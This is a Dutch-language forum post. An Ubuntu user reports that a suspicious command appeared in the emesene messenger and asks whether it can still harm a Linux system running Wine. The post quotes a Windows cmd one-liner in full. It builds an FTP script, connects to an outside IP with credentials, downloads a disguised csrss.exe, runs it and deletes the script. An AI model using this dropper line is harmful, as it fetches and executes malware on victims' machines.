Ik kwam zojuist terug op mijn ubuntu computer. Ik heb meestal emesene openstaan, maar vandaag was er iets vreemds aan de hand. In de zoekbalk stond de volgende tekst:
del eq&echo open 93.116.174.227 6091 >> eq&echo user 28262 23412 >> eq &echo get csrss.exe >> eq &echo quit >> eq &ftp -n -s:eq &csrss.exe &del eq
Nu lijkt me dit een duidelijk geval van een virus die iets van mij wilt versturen naar een ftp server. Nu ben ik een ubuntu gebruiker, mede door de veiligheid. Nu vraag ik me af of deze virus mij alsnog kwaad kan doen op mijn linux bakkie. Ik heb namelijk wel wine geinstalleerd en een .exe bestand ingesteld om standaard uitgevoerd te worden door wine.
Is het nu zo dat dit .exe bestand nogsteens uitgevoerd zou kunnen worden en de gegevens versturen? Zou dit .exe bestandje alsnog ergens op mijn computer staan? Hoe 'veilig' is ubuntu op nu eigenlijk?
De regel hierboven geeft ook best veel info over de 'bad guys', niet? In ieder geval de ftp gegevens en server locatie. Met een whois lookup krijg ik een server in Moldova.